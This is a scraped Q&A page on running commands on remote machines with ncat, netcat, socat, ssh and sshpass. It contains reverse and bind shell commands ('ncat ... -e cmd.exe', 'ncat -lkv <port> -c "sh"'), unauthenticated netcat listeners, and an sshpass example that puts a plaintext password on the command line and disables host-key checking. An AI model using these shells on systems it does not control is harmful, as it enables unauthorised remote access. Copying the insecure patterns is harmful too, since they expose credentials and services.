Ncat connect and immediately execute command on Windows - linux

I'm trying to figure out a way to open a netcat connection from a listening Linux machine and immediately execute a command on the targeted Windows machine (ex. dir or ipconfig).
Something similar to this:
Linux machine:
nc -lvp 4444; dir
Windows machine:
ncat 192.168.1.25 4444 -e cmd.exe
I need to immediately run a command as soon as a connection is made with the Windows machine.
If this can be accomplished with a bash script, that would be great too. I tried scripting it, but it will not register any commands after dropping into the Windows command shell.
Any help or suggestions would be greatly appreciated! Thanks.

https://jkeohan.wordpress.com/2010/04/30/using-netcat-to-spawn-a-remote-shell/
this might be of help.
It should be:
##On the server. It opens the
##listening machine's shell.
ncat -lkv <port number> -c "sh"
##On the client. You type your commands on your terminal
##and the listening machine will be your target.
ncat -v <listening server's IP> <port number>

The command should be on nc's standard input, not a local command to run after nc finishes.
printf "dir\n" | nc -lvp 444
See also Pass commands as input to another command (su, ssh, sh, etc)

Related

How return output in local machine from socat command linux

I have an up and running service ( is an emulated machine or something similar ) on my local Ubuntu machine and i'm able to access it through a serial port and following socat command:
> sudo socat file:`tty`,raw,escape=0x1d,echo=0 unix-connect:/tmp/sample-serial
root#sample:~#
I exit from the service and with the following socat command i can execute the bash file ( is in local machine ) to this service.
> sudo socat file:my_bash_script.sh unix-connect:/tmp/sample-serial
If i enter again with the first socat command in the service i can see my_bash_script.sh output going on in the service terminal
The question is: how i can see the output of this my_bash_script.sh from local machine?
Consider that in the service, socat command not exist then i can't open a TCP connections or similar.
Kind Regards
in the second command, the file: address appends the command output to the script. Try something like
sudo socat file:my_bash_script.sh!!- unix-connect:/tmp/sample-serial
to get command output on your terminal.
Please note that '!' may substitute part of the command line with some terminal history, type
set +H
to turn this behaviour off.

establish ssh connection and execute command remotely [duplicate]

I wish to run a script on the remote system and then wish to stay there.
Running following script:-
ssh user#remote logs.sh
This do run the script but after that I am back to my host system. i need to stay on remote one. I tried with..
ssh user#remote logs.sh;bash -l
somehow it solves the problem but still not working exactly as a fresh login as the command:-
ssh user#remote
Or it will be better if i could include something in my script that would open the bash terminal in the same directory where the script was running. Please suggest.
Try this:
ssh -t user#remote 'logs.sh; bash -l'
The quotes are needed to pass both commands to ssh. The -t option forces a pseudo-tty allocation.
Discussion
Consider:
ssh user#remote logs.sh;bash -l
When the shell parses this line, it splits it into two commands. The first is:
ssh user#remote logs.sh
This runs logs.sh on the remote machine. The second command is:
bash -l
This opens a login shell on the local machine.
The quotes were added above to prevent the shell from splitting up the commands this way.

Executing SSH with the Linux/Unix at command

I place this ssh call in the following a shell script on our Linux box named "tstz" and then call it with the linux "at" command in order to schedule it for later execution.
tstz script:
#! /bin/ksh
/usr/bin/ssh -tt <remote windows server> pmcmds ${fl} ${wf} < /dev/null >/tmp/test1.log 2>&1
at command syntax:
at -f tstz now + 1 minute
The ssh call executes remote command as expected, but the ssh connection closes immediately before the remote command has completed. I need the connection to stay open until the remote command has completed and then return control to the tstz script with an exit status.
This is the error I get in the /tmp/test1.log:
tcgetattr: Inappropriate ioctl for device
^[[2JConnection to dc01nj2dwifdv02.nj.core.him closed.^M
NOTE: When using the "at" command to schedule tstz, if I don't use -tt, the ssh command will not execute the remoted command "pmcmds ${fl} ${wf}". I believe this is because a terminal is required. I can however run tstz from the Linux command prompt in the foreground without the -tt on the ssh command line and it runs as expected.
Any help would be greately appreciated. Thanks!
As I understand you need to specify a command to execute on the REMOTE machine after successfully connecting to the server, not on LOCAL machine.
I use following command
ssh -i "key.pem" ec2-user#ec2-XX-XX-XX-XX.us-west-2.compute.amazonaws.com -t 'command; bash -l -c "sudo su"'
where you should replace "sudo su" with your own command, I guess with "pmcmds DFD_ETIME wf_TESTa"
So, try to issue, maybe
/usr/bin/ssh -tt <remote windows server> 'command; bash -l -c "pmcmds DFD_ETIME wf_TESTa"'
P.S. I have discovered interesting service on google called "explainshell"
which helped me to understand that "command;" keyword is crucial inside quotes.

open telnet using shell and passing commands

I am new to linux and shell scripting. I want to connect to localhost and interact it.
#! /bin/bash
(exec /opt/scripts/run_server.sh)
when i execute this bash script, it starts listening on a port.
Listening on port xxxxx
Now i want to issue this command "telnet localhost xxxxx"
I tried something like this:
#! /bin/bash
(exec /opt/opencog/scripts/run_server.sh)&&
telnet localhost xxxxx
It is still listening on the port. But i think second command is not running. I expect another window showing that it is being connected like this.
vishnu#xps15:~$ telnet localhost xxxx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
server>
The reason why i executing these as a script is that, automatically in the server i need to carry out some process by issuing certain commands like this "scm" "parse" etc.....
vishnu#xps15:~$ telnet localhost xxxx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
server>scm
Entering scheme shell; use ^D or a single . on a line by itself to exit.
guile> (parse "i eat apple")
I have lots of text coming. Manually i cant issue this parse command for each and every sentence. so i want to automate. So i need to write a script for connecting to the server and interacting.
Any guidelines. Finally How to interact/send commands to this guile shell?
One way to login to the linux server as a same or different user and run some command or .sh script (very useful for post-commit hooks or cron jobs) is to use program called sshpass, for example a cron job command or svn post-commit hook would look like this:
/usr/bin/sshpass -p 'password' /usr/bin/ssh
-o StrictHostKeyChecking=no -q user#localhost 'any command'
Just replace password with your password, and user with your user, and put command that you need to run as that particular user...
To install sshpass it on ubuntu just type
apt-get install sshpass
Or on CentOs
yum install sshpass
I solved this with the netcat (nc) command.
$ echo "command1\ncommand2\n" | nc localhost xxxxx
I could manually connect to localhost using telnet localhost xxxx and then i can pass commands from shell to localhost like this.
If you need to use telnet, this solution may help you. Otherwise, use ssh, as other answer suggests.
You can use anything that produces output to write lines one by one, followed by "\r\n", and pipe these lines to ncat, e.g.:
echo -e "command1\r\ncommand2\r\n" | ncat localhost 5000
-e option makes echo interpret "\r\n" as special symbols.

get the process name from remote machine

How do I get the name of a process from a remote machine without ssh.
I have to get the name of the process without doing ssh or any other such utility.
Thanks in advance.
You can do it very quickly using netcat nc
On the remote server run this command:
while $(true); do ps -eaf | nc -l 1234; done
This uses netcat to send the output of ps to port 1234. It is in a loop so that it will work more than once.
Then from your local you just have to run this command:
nc my_server 1234
And you will get a list of all the processes. If you don't have nc on the client you can just use telnet:
telnet my_server 1234

Resources